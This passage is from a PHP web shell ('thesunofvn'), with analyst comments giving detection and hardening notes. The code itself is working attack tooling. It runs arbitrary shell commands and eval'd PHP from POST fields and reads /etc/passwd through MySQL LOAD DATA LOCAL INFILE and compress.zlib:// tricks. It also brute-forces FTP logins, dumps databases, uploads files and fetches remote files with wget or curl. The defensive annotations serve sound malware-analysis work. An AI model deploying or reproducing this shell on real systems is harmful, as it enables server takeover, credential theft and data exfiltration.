  2492. else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
  2493.  $cmd_rep = ex($_POST['cmd']);
  2494.  if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
  2495.  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
  // Handler for cmd=thesunofvn_mysql: reads a file from the web host through
  // MySQL's LOAD DATA LOCAL INFILE instead of PHP file functions.
  // It connects with the supplied host/port/credentials (defaults localhost
  // and 3306), selects the given database, creates a scratch table named
  // "thesunofvn", loads the file named by test3_file into it, prints the
  // rows through htmlspecialchars(), and drops the table again.
  // test3_file is placed in the SQL text after only a backslash-to-slash
  // replacement; all mysql_* calls are @-suppressed.
  // Defender note: a short-lived table named thesunofvn and LOAD DATA LOCAL
  // INFILE statements in the general/audit log are indicators. Disabling
  // local infile on the server (local_infile=0) and in the PHP client
  // configuration removes this read path.
  2496. if ($_POST['cmd']=="thesunofvn_mysql")
  2497.  {
  2498.   if(empty($_POST['test3_sr'])) { $_POST['test3_sr'] = "localhost"; }
  2499.   if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
  2500.   $db = @mysql_connect($_POST['test3_sr'].':'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
  2501.   if($db)
  2502.    {
  2503.    if(@mysql_select_db($_POST['test3_md'],$db))
  2504.     {
  2505.      @mysql_query("DROP TABLE IF EXISTS thesunofvn");
  2506.      @mysql_query("CREATE TABLE `thesunofvn` ( `file` LONGBLOB NOT NULL )");
  2507.      @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['test3_file'])."\" INTO TABLE thesunofvn FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
  2508.      $r = @mysql_query("SELECT * FROM thesunofvn");
  2509.      while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
  2510.      @mysql_query("DROP TABLE IF EXISTS thesunofvn");
  2511.     }
  2512.     else echo "[-] ERROR! Can't select database";
  2513.    @mysql_close($db);
  2514.    }
  2515.   else echo "[-] ERROR! Can't connect to mysql server";
  2516.  }
  // Login loop for the "ftp_brute" action. For each name in $users a fresh
  // FTP connection is opened to $ftp_server:$ftp_port (both set by the
  // earlier ftp_brute pre-flight block) and a login is attempted with the
  // password equal to the user name; when the "reverse" field is present and
  // that fails, the reversed user name is tried as well. Successes are
  // printed and counted, followed by a summary of attempts and hits.
  // Defender note: the server-side signature is a burst of FTP logins across
  // many accounts, each with password == username (or its reverse), coming
  // from one web host. Login rate limiting / lockout and rejecting
  // username-derived passwords at account creation defeat it.
  2517. if ($_POST['cmd']=="ftp_brute")
  2518.  {
  2519.  $suc = 0;
  2520.  foreach($users as $user)
  2521.   {
  2522.   $connection = @ftp_connect($ftp_server,$ftp_port,10);
  2523.   if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
  2524.   else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
  2525.   @ftp_close($connection);
  2526.   }
  2527.  echo "\r\n-------------------------------------\r\n";
  // The reported attempt count is doubled when the reverse option is set.
  2528.  $count = count($users);
  2529.  if(isset($_POST['reverse'])) { $count *= 2; }
  2530.  echo $lang[$language.'_text97'].$count."\r\n";
  2531.  echo $lang[$language.'_text98'].$suc."\r\n";
  2532.  }
  // Handler for cmd=php_eval: removes "<?" and "?>" from the php_eval request
  // field and passes the remainder to eval(), with errors suppressed.
  // This is direct execution of request-supplied PHP in the web server's context.
  // Defender note: eval is a language construct, so disable_functions cannot
  // block it; detection has to come from file-integrity monitoring, static
  // scanning for eval() on request data, and inspection of POST bodies for a
  // php_eval field.
  2533. if ($_POST['cmd']=="php_eval"){
  2534.  $eval = @str_replace("<?","",$_POST['php_eval']);
  2535.  $eval = @str_replace("?>","",$eval);
  2536.  @eval($eval);}
  // Handler for cmd=mysql_dump: configures a my_sql object from request
  // fields (engine, host, port, credentials, database), connects, selects
  // the database and dumps the table named by mysql_tbl.
  // When the "dif" field is set, the dump lines are written to the path in
  // dif_name (opened for writing up front); otherwise they are echoed into
  // the page. The my_sql class is defined outside this excerpt.
  // Defender note: this is the bulk data-extraction path of the shell.
  // Full-table reads issued by the application's database account outside
  // normal query patterns, and dump files appearing on the web host, are
  // the signals; least-privilege database accounts bound the damage.
  2537. if ($_POST['cmd']=="mysql_dump")
  2538.  {
  2539.   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  2540.   $sql = new my_sql();
  2541.   $sql->db   = $_POST['db'];
  2542.   $sql->host = $_POST['db_server'];
  2543.   $sql->port = $_POST['db_port'];
  2544.   $sql->user = $_POST['mysql_l'];
  2545.   $sql->pass = $_POST['mysql_p'];
  2546.   $sql->base = $_POST['mysql_db'];
  2547.   if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
  2548.   else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
  2549.   else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
  2550.   else {
  2551.    if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
  2552.    else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
  2553.    else { echo "[-] ERROR! Can't write in dump file"; }
  2554.    }
  2555.  }
  2556. echo "</textarea></div>";
  2557. echo "</b>";
  2558. echo "</td></tr></table>";
  2559. echo "<table width=100% cellpadding=0 cellspacing=0>";
  // div_title($title, $id): returns an HTML anchor showing $title whose
  // onClick calls the client-side function change_divst() with $id.
  // Both arguments are concatenated into the markup without escaping;
  // change_divst() is defined outside this excerpt.
  2560. function div_title($title, $id)
  2561. {
  2562.   return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
  2563. }
  // div($id): returns the opening <div> tag for a UI panel. When a cookie
  // named $id exists and loosely compares equal to 0, the panel is emitted
  // with display:none; otherwise it is emitted visible.
  // $id is written into the attribute without escaping.
  2564. function div($id)
  2565.  {
  2566.  if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
  2567.  return '<div id="'.$id.'">';
  2568.  }
  2569. if(!$safe_mode){
  2570. echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
  2571. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
  2572. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  2573. echo $te.'</div>'.$table_end1.$fe;
  2574. }
  2575. else{
  2576. echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
  2577. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
  2578. echo $te.'</div>'.$table_end1.$fe;
  2579. echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id511').$table_up2.div('id511').$ts;
  2580. echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2581. echo $te.'</div>'.$table_end1.$fe;
  2582. }
  2583. if($safe_mode){
  2584. echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
  2585. echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):(""))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
  2586. echo $te.'</div>'.$table_end1.$fe;
  2587. echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
  2588. echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):(""))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0755"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  2589. echo $te.'</div>'.$table_end1.$fe;
  2590. }
  // Analyst note: this run only renders HTML forms; the code that acts on the
  // posted values is outside this view. in(), sr(), ws(), div(), div_title()
  // and the $fs/$fe/$ts/$te/$table_* fragments are defined earlier in the file
  // (presumably form/table markup helpers -- confirm there).
  // Every form except the last carries a hidden `cmd` selector and a hidden
  // `dir`, plus one path field. Selector / field / pre-filled value seen here:
  //   cmd=edit_file    e_name       $dir
  //   cmd=glob         glob         /etc/
  //   cmd=root         root         /etc/
  //   cmd=copy         snn          /etc/passwd
  //   cmd=ini_restore  ini_restore  /etc/passwd
  //   cmd=test19       test19       /etc/passwd
  //   cmd=file         file         /etc/passwd
  //   (no cmd)         file1        $_POST['file1'] or /etc/passwd -> rsg_read()
  // Detection: these parameter names arriving together with `cmd` and `dir` in a
  // POST body look usable as a request-log / WAF indicator for this script;
  // validate against the handlers before relying on them.
  // NOTE(review): 'id3' is used as the div id for two different panels in this
  // run (2591 and 2601), so any id-keyed toggle presumably collides.
  2591. echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
  2592. echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
  2593. echo $te.'</div>'.$table_end1.$fe;
  2594. echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id207').$table_up2.div('id207').$ts;
  2595. echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2596. echo $te.'</div>'.$table_end1.$fe;
  2597. echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id209').$table_up2.div('id209').$ts;
  2598. echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in
  2599. ('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2600. echo $te.'</div>'.$table_end1.$fe;
  2601. echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
  2602. echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2603. echo $te.'</div>'.$table_end1.$fe;
  2604. echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id411').$table_up2.div('id411').$ts;
  2605. echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2606. echo $te.'</div>'.$table_end1.$fe;
  2607. echo $fs.$table_up1.div_title($lang[$language.'_text125'],'id2900').$table_up2.div('id2900').$ts;
  2608. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19',85,'/etc/passwd').in('hidden','cmd',0,'test19').in
  2609. ('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  2610. echo $te.'</div>'.$table_end1.$fe;
  2611. echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id2901').$table_up2.div('id2901').$ts;
  2612. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','file',85,'/etc/passwd').in
  2613. ('hidden','cmd',0,'file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  2614. echo $te.'</div>'.$table_end2.$fe;
  2615. echo $table_up1.div_title($lang[$language.'_text131'],'id2902').$table_up2.div('id2902').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
  2616. echo "<font face=tahoma size=-2><b><div align=center id='n'>Read File</div></b></font>";
  // The previous POST value of file1 is passed back into the field as its value;
  // whether it is HTML-escaped depends on in(), which is not visible here.
  2617. echo sr(25,"<b>File :".$arrow."</b>",in('text','file1',40,(!empty($_POST['file1']))?($_POST['file1']):("/etc/passwd")).in('submit','submit',2,"Read File"));
  /**
   * Copy the file named by $_POST['file1'] to a temp file through the
   * compress.zlib:// stream wrapper and print its contents in a <textarea>.
   *
   * Takes no parameters and returns nothing; input comes straight from the
   * request and output is echoed. On a failed copy() the function calls die(),
   * which ends the whole page, not just this panel.
   *
   * Analyst notes:
   *  - The path is used with no validation or allow-list of any kind.
   *  - Routing the read through compress.zlib:// instead of a plain path is
   *    presumably meant to get around path restrictions on older PHP builds;
   *    confirm against the PHP version in scope. Statically, the literal
   *    "compress.zlib://" concatenated with request input is a strong signature.
   *  - Both the requested name and the file contents are passed through
   *    htmlspecialchars() before being echoed.
   *  - The temp file is removed only on the success path; die() runs before
   *    unlink(), so a failed read leaves a zero-byte "cx*" temp file behind.
   *    Such leftovers in the temp directory are a possible forensic artefact.
   */
  2618. function rsg_read()
  2619.         {      
          // An empty directory argument makes tempnam() fall back to the system
          // temp directory; "cx" is the file-name prefix.
  2620.         $test="";
  2621.         $temp=tempnam($test, "cx");
  2622.         $file1=$_POST['file1'];
  2623.         $get=htmlspecialchars($file1);
  2624.         echo "<center><br><b><font size=2>Trying To Get File <font color=red><b>$get</b></font><br>";
  2625.         if(copy("compress.zlib://".$file1, $temp)){
          // NOTE(review): fopen() is not checked, and fread() is given
          // filesize($temp) as its length, so an empty source file makes the
          // read fail (warning on older PHP, ValueError on PHP 8).
  2626.         $fichier = fopen($temp, "r");
  2627.         $action = fread($fichier, filesize($temp));
  2628.         fclose($fichier);
  2629.         $source=htmlspecialchars($action);
  2630. echo "<div align=\"center\"><b><font size=2><br><font color=\"red\"><textarea name=report cols=60 rows=10>$source</textarea><br><b><br>Found <b><font size=2>$get</font></b>";
  2631.         unlink($temp);
  2632.         } else {
  2633.         die("<b><font size=2><CENTER>Sorry... File
  2634.         <font color=red><B>".htmlspecialchars($file1)."</B></font> dosen't exists or you don't have
  2635.         access.</CENTER></FONT>");
  2636.                         }
  2637.         echo "</div>";
  2638.         }
  // rsg_read() runs whenever the request carries a file1 field, whatever `cmd`
  // says; nothing in this view gates it on authentication or on $safe_mode.
  2639. if(isset($_POST['file1']))
  2640. {
  2641. rsg_read();
  2642. }
  // Second half of the same two-column table: the "View Dir" form. Its
  // `directory` field defaults to /etc and is handled by rsg_glob(); the previous
  // POST value is passed back into the field (escaping depends on in(), not
  // visible here).
  2643. echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
  2644. echo "<font face=tahoma size=-2><b><div align=center id='n'>View Dir</div></b></font>";
  2645. echo sr(20,"<b>Dir :".$arrow."</b>",in('text','directory',40,(!empty($_POST['directory']))?($_POST['directory']):("/etc")).in('submit','submit',2,'View'));
  /**
   * List filesystem entries whose path starts with $_POST['directory'] and
   * print them, one per line, inside a <textarea>.
   *
   * Takes no parameters and returns nothing. The glob pattern is the posted
   * string with "*" appended, so it is a prefix match: without a trailing slash
   * it matches siblings that share the prefix rather than the directory's
   * children, and any glob metacharacters in the input are honoured.
   *
   * Analyst notes:
   *  - Unlike rsg_read(), nothing here is HTML-escaped: the posted string and
   *    every returned file name are echoed raw, so this panel reflects markup
   *    from the request (and from file names) into the page.
   *  - glob() can return false on error; the foreach does not guard for that.
   */
  2646. function rsg_glob()
  2647. {
  2648. $chemin=$_POST['directory'];
  2649. $files = glob("$chemin*");
  2650. echo "<center><b><font size=2>Trying To List Folder <font color=red><b>$chemin</b></font><br>";
  2651. echo "<textarea cols=60 rows=10>";
  2652. foreach ($files as $filename) {
  2653.            echo "$filename\n";
  2654.            }echo "</textarea></center>";
  2655.            }
  // rsg_glob() runs whenever the request carries a `directory` field; as with
  // file1 above, no other condition is checked in this view.
  2656. if(isset($_POST['directory']))
  2657. {
  2658. rsg_glob();
  2659. }
  2660. echo $te."</td>".$fe."</tr></div></table>";
  // Panels rendered only when a particular PHP extension is loaded. Each posts a
  // hidden `cmd` plus one free-text field; the handlers are outside this view.
  //   cmd=zend    zend        (always shown; default /etc/passwd)
  //   cmd=test14  test14_cmd  (ionCube Loader)
  //   cmd=test15  test15_cmd  (win32std;     default 'dir')
  //   cmd=test16  test16_cmd  (win32service; default 'dir')
  //   cmd=test18  test18_cmd  (ffi;          default 'dir')
  // Hardening: the extension checks mean these panels depend on what the host
  // has loaded, so trimming unused extensions removes them from the page.
  // NOTE(review): win32std and win32service are Windows-only extensions and the
  // default value is the Windows `dir` command, yet the guards test $unix.
  // $unix is set outside this view; either it is misnamed or the condition is
  // inverted -- confirm where it is assigned.
  2661. echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id210').$table_up2.div('id210').$ts;
  2662. echo "<table class=table1 width=100% align=center>";
  2663. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])
  2664. ?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in
  2665. ('submit','submit',0,$lang[$language.'_butt8']));
  2666. echo $te.'</div>'.$table_end1.$fe;
  2667. if(extension_loaded("ionCube Loader"))
  2668. {
  2669. echo $fs.$table_up1.div_title($lang[$language.'_text230'],'id230').$table_up2.div('id230').$ts;
  2670. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test14_cmd',96,(!empty($_POST['test14_cmd'])?($_POST['test14_cmd']):(''))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14').in('submit','submit',0,$lang[$language.'_butt8']));
  2671. echo $te.'</div>'.$table_end1.$fe;  
  2672. }
  2673. if($unix&&extension_loaded("win32std"))
  2674. {
  2675. echo $fs.$table_up1.div_title($lang[$language.'_text231'],'id231').$table_up2.div('id231').$ts;
  2676. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test15_cmd',96,(!empty($_POST['test15_cmd'])?($_POST['test15_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15').in('submit','submit',0,$lang[$language.'_butt8']));
  2677. echo $te.'</div>'.$table_end1.$fe;  
  2678. }
  2679. if($unix&&extension_loaded("win32service"))
  2680. {
  2681. echo $fs.$table_up1.div_title($lang[$language.'_text232'],'id232').$table_up2.div('id232').$ts;
  2682. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test16_cmd',96,(!empty($_POST['test16_cmd'])?($_POST['test16_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').in('submit','submit',0,$lang[$language.'_butt8']));
  2683. echo $te.'</div>'.$table_end1.$fe;  
  2684. }
  2685. if($unix&&extension_loaded("ffi"))
  2686. {
  // NOTE(review): the title is keyed 'id35' but the div is 'id234'; every other
  // panel in this view uses the same id for both.
  2687. echo $fs.$table_up1.div_title($lang[$language.'_text132'],'id35').$table_up2.div('id234').$ts;
  2688. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test18_cmd',96,(!empty($_POST['test18_cmd'])?($_POST['test18_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18').in('submit','submit',0,$lang[$language.'_butt8']));
  2689. echo $te.'</div>'.$table_end1.$fe;  
  2690. }
  // Builds the <option> list for the alias selector from $aliases (a
  // name => command map defined outside this view). Only the names are emitted
  // here, unescaped; the command half of each pair is not used in this loop.
  2691. $aliases2 = '';
  2692. foreach ($aliases as $alias_name=>$alias_cmd)
  2693.  {
  2694.  $aliases2 .= "<option>$alias_name</option>";
  2695.  }
  // Alias form: posts `alias` and `dir` with no hidden `cmd`.
  2696. echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
  2697. echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  2698. echo $te.'</div>'.$table_end1.$fe;
  // Text-search form: cmd=search_text with s_text, s_dir (default $dir), s_mask
  // (default '.php;.asp;.aspx;.cfm') and checkbox `m`.
  2699. echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
  2700. echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
  2701. echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ");
  2702. echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.php;.asp;.aspx;.cfm')."*".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
  2703. echo $te.'</div>'.$table_end1.$fe;
  // Shown only when $curl_on is set (assigned outside this view): two file-path
  // forms, cmd=test1 (test1_file) and cmd=cURL (ly0kha), both defaulting to
  // /etc/passwd. The odd field name `ly0kha` is a distinctive string for
  // request-log matching.
  2704. if($curl_on)
  2705. {
  2706. echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
  2707. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  2708. echo $te.'</div>'.$table_end1.$fe;
  2709. echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
  2710. echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ly0kha',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2711. echo $te.'</div>'.$table_end1.$fe;
  2712. }
  // Shown only when $mssql_on is set: cmd=test4 with test4_md (default "master"),
  // test4_ml (default "sa"), test4_mp, test4_port (default 1433) and test4_file
  // (default "dir"). The password field is a plain text input and, like the
  // others, is pre-filled from the previous POST.
  2713. if($mssql_on)
  2714. {
  2715. echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
  2716. echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):(""))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
  2717. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  2718. echo $te.'</div>'.$table_end1.$fe;
  2719. }
  // PHP-eval panel: a textarea named php_eval posted with cmd=php_eval. The
  // handler is outside this view; the name and the default text indicate the
  // submitted string is run as PHP code.
  //  - The previous POST value is echoed into the textarea without escaping.
  //  - The default text is a fixed literal (unlink of "thesunofvn.php", three
  //    reads of /etc/passwd, a symlink to "sun.txt"); those strings are stable
  //    content indicators for this paste.
  //  - Detection: a POST parameter literally named php_eval is a high-signal
  //    request-log match.
  2720. echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
  2721. echo "<div align=center>".div('id9')."<textarea name=php_eval cols=120 rows=5>";
  2722. echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\nunlink(\"thesunofvn.php\");\r\nreadfile(\"/etc/passwd\");\r\necho file_get_contents(\"/etc/passwd\");\r\npassthru(\"ln -s /etc/passwd sun.txt\");"));
  2723. echo "</textarea>";
  2724. echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
  2725. echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
  2726. echo "</div></div></font>";
  2727. echo $table_end1.$fe;
  // Bare brace block with no condition (presumably a guard that was removed):
  // the upload form is always rendered. It opens its own multipart <form>
  // instead of $fs, offers five file inputs userfile0..userfile4, and posts
  // only `dir` alongside them -- there is no hidden `cmd`.
  // Detection: multipart POSTs carrying userfile0..userfile4 to a single script.
  2728. {
  2729. echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
  2730. echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
  2731. echo "<tr><td valign=top width=50%>".$ts;
  2732. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',70,''));
  2733. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',70,''));
  2734. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',70,''));
  2735. echo $te."</td><td valign=top width=50%>".$ts;
  2736. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',70,''));
  2737. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',70,''));
  2738. echo sr(10,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
  2739. echo $te."</td></tr>";
  2740. echo $te.'</div>'.$table_end1.$fe;
  2741. }
  // Remote-fetch form, rendered only when $safe_mode is off and $unix is set
  // (both assigned outside this view). Posts `with` (one of wget, fetch, lynx,
  // links, curl, GET), rem_file (pre-filled "http://"), loc_file (pre-filled
  // $dir) and `dir`; no hidden `cmd`. The `with` values are names of
  // command-line download tools, so the handler presumably shells out -- confirm
  // in the handler.
  // Detection: web-server processes spawning any of those binaries.
  2742. if(!$safe_mode&&$unix){
  2743. echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
  2744. echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
  2745. echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
  2746. echo $te.'</div>'.$table_end1.$fe;
  2747. }
  // File-download form: cmd=download_file with d_name (pre-filled $dir) and a
  // `compress` radio group. 'none' is always offered (its extra fifth argument 1
  // presumably marks it checked); zip/gzip/bzip appear only when the matching
  // compression function exists on the host.
  2748. echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
  2749. echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
  2750. $arh = $lang[$language.'_text92'];
  2751. if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
  2752. if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
  2753. if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
  2754. echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
  2755. echo $te.'</div>'.$table_end1.$fe;
  // FTP panel, rendered when $unix is set and ftp_connect() exists:
  // cmd=ftp_brute with ftp_server_port and checkbox `reverse`, plus a link to
  // this script with the query string "?users".
  // NOTE(review): $_SERVER['PHP_SELF'] is written into an unquoted href with no
  // escaping; PHP_SELF includes request-supplied path info, so this is a
  // reflected-markup sink in the page itself.
  // Detection: bursts of outbound FTP logins originating from the web host.
  2756. if($unix && @function_exists("ftp_connect")){
  2757. echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
